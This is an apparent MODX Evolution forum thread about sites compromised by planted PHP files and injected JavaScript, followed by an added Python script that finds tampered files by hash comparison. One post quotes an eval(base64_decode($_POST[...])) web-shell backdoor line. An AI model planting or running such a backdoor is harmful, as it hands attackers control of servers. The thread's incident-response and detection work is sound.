  • Oh, this was an Evo thread. I didn't want to hijack it. Anyway, it belongs together somehow.
      • 33186
      • 17 Posts
      Hello,

      I started this thread....

      First: Great that so many people give responses and feedback!

      But....

      Everybody is talking about another old hack. This hack, which everybody is talking about, is installed by old files from 10.0.x. When you update to 10.0.14 it's possible the installed hack files are not gone and can still be used by the hacker. The hacker installed random .php files with encrypted code and sometimes starts it with a code like <?php eval(base64_decode($_POST['<random_string_here>']));?> When he starts the code, the server starts to spam mail. In no time your server is on a blacklist...

      I am talking about something else.....

      Some of my sites were offline because a hacker installed malware. Google noticed this and immediately blocked the site with a warning message, and no happy clients....

      The hacker infected all of my .js files with the code you find in the attachment

      My question is, how could this happen and how can I prevent this...
      • Sorry Yoman, all answers in this thread don't show the attacking vector so it is almost impossible to tell if it is an old hack or a new one.

        If it is an old one, you should update MODX with the alternate method. With 5. you have a clean system. Every file that is copied in 6., 7. and 8. has to be checked for a possible infection or should be installed new from a secure source (i.e. the MODX repository).

        If it is a new one, you can only cure the symptoms (restore the .js files and make them writable only by FTP, if the changes are done by a PHP shell and your webserver config uses different rights for PHP and FTP) until the attacking vector is detected.
          • 28107
          • 230 Posts
          same here (like Spheerys described above) - and I was pretty sure that we'd cleaned everything when we updated to 1.0.14.
          Modified files were from last week.

          In this case we also replaced the manager and assets folders completely and
          found that there is a newer library available for

          /assets/snippets/phpthumb/phpthumb.class.php
          (updated to Version 1.7.13-201406261000)

          That might be a new vulnerability, but I'm not absolutely sure.
            CONIN Werbeagentur . Köln
            http://www.conin.de
            • 36582
            • 463 Posts
            I just got asked to look at a crippled Modx site. I'm seeing the same hack with every .js file on the site affected with the script as mentioned by Yoman.

            It also gets mentioned here along with a possible clean-up script:

            http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/
              Web site design in Nottingham UK by Chris Fickling http://www.chrisficklingdesign.co.uk
            • This phpthumb version is already in the bugfix branch. But I don't think that it has those security issues (see changelog).

              Do you have an access log around the time the files were modified?
                • 28107
                • 230 Posts
                Quote from: Jako at Sep 17, 2014, 08:39 AM
                This phpthumb version is already in the bugfix branch. But I don't think that it has those security issues (see changelog).

                Do you have an access log around the time the files were modified?

                unfortunately not
                  CONIN Werbeagentur . Köln
                  http://www.conin.de
                  • 28173
                  • 409 Posts
                  Could it be possible that the malware is hiding itself in the database?
                  For example, if we delete blog.php (or similar), like "magic", the malicious code recreates it from the database?
                    • 28107
                    • 230 Posts
                    Quote from: Spheerys at Sep 17, 2014, 09:11 AM
                    Could it be possible that the malware is hiding itself in the database?
                    For example, if we delete blog.php (or similar), like "magic", the malicious code recreates it from the database?

                    Possible? Yes. But not very likely. You can test that with a dump of your database and a text search against the content of your blog.php.


                    edit: typos
                      CONIN Werbeagentur . Köln
                      http://www.conin.de
                      • 36582
                      • 463 Posts
                      What I know so far if it helps...

                      Time stamps on the server don't give any clue as they are falsified to make it look like they are older.

                      Seems like .php files are 'planted' around 60 days before injection into .js files happens.

                      Can't find anything in the database that indicates it's compromised.
                        Web site design in Nottingham UK by Chris Fickling http://www.chrisficklingdesign.co.uk
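                      Because the timestamps are falsified (as the post above notes), a "what changed recently" check is useless here; what still works is comparing file hashes against a clean copy, as suggested earlier in the thread (a fresh install from the MODX repository plus your own known-clean templates and snippets). The script below is an added example for this thread, not code from the original posts or from MODX; the file names and contents are constructed placeholders, and it assumes you have such a clean reference tree on disk.

```python
import hashlib
import os
import tempfile
import time


def build_manifest(root):
    """Map every file under `root` (relative, '/'-separated) to its SHA-256.

    File mtimes are deliberately ignored: the attacker controls them, the content hash he cannot fake.
    """
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[os.path.relpath(path, root).replace(os.sep, "/")] = digest.hexdigest()
    return manifest


def diff_manifests(clean, live):
    """Compare the clean reference with the live site: edited files, unknown extra files, missing files."""
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def write_tree(root, files):
    """Helper for the constructed scenario: write {relative_path: content} under root."""
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Constructed scenario: a clean copy, and a live copy with one edited .js and one planted .php."""
    clean_files = {
        "index.php": "<?php require 'manager/includes/config.inc.php'; ?>\n",
        "assets/js/site.js": "document.title = 'demo';\n",
        "manager/index.php": "<?php /* manager */ ?>\n",
    }
    live_files = dict(clean_files)
    live_files["assets/js/site.js"] += "/* injected payload placeholder */\n"
    live_files["assets/cache/x1f9a.php"] = "<?php /* planted dropper placeholder */ ?>\n"
    with tempfile.TemporaryDirectory() as clean_root, tempfile.TemporaryDirectory() as live_root:
        write_tree(clean_root, clean_files)
        write_tree(live_root, live_files)
        # Backdate the tampered file by ~60 days, as the post describes: a timestamp-based
        # check would miss it, the hash comparison still reports it.
        old = time.time() - 60 * 86400
        os.utime(os.path.join(live_root, "assets", "js", "site.js"), (old, old))
        return diff_manifests(build_manifest(clean_root), build_manifest(live_root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

                      On a real site: diff_manifests(build_manifest('/path/to/clean'), build_manifest('/path/to/live')). The "added" list is where the planted .php files show up (cache, upload and assets directories in particular); the "modified" list is where injected .js files show up regardless of what their timestamps claim.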